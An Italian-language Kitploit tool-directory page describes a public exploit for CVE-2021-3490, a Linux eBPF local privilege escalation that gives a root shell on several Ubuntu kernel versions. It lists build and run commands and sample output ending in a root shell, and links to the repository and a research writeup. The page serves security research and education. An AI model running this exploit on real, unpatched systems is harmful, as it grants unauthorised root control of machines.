Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e FormazioneBinary Exploitation
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

Exploit di escalation dei privilegi locali del kernel Linux basato su eBPF che mira a CVE-2021-3490. Fornisce accesso a una shell di root sui kernel Ubuntu vulnerabili dalla versione 5.8.0-25 alla 5.11.0-16.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3174823 anni faRevisionato da Kitploit

Linux_LPE_eBPF_CVE-2021-3490

Exploit LPE per CVE-2021-3490. Testato su Ubuntu 20.04.02 e 20.10 (Groovy Gorilla) kernel 5.8.0-25.26 fino a 5.8.0-52.58. e Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. La vulnerabilità è stata scoperta da Manfred Paul @_manfp e corretta in questo commit.

autore: @chompie1337

Solo a scopo educativo/di ricerca. Usa a tuo rischio.

Utilizzo:

Per compilare per Ubuntu 20.04.02 e Ubuntu 20.10 (Groovy Gorilla):

root@kitploit:~
make groovy

Per compilare per Ubuntu 21.04 (Hirsute Hippo):

root@kitploit:~
make hirsute

Per eseguire:

root@kitploit:~
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Nota: Devi obbligatoriamente uscire pulitamente dalla shell di root digitando exit per eseguire la pulizia ed evitare un kernel panic.

Dai un'occhiata al writeup Kernel Pwning with eBPF: a Love Story.

Scarica lo strumento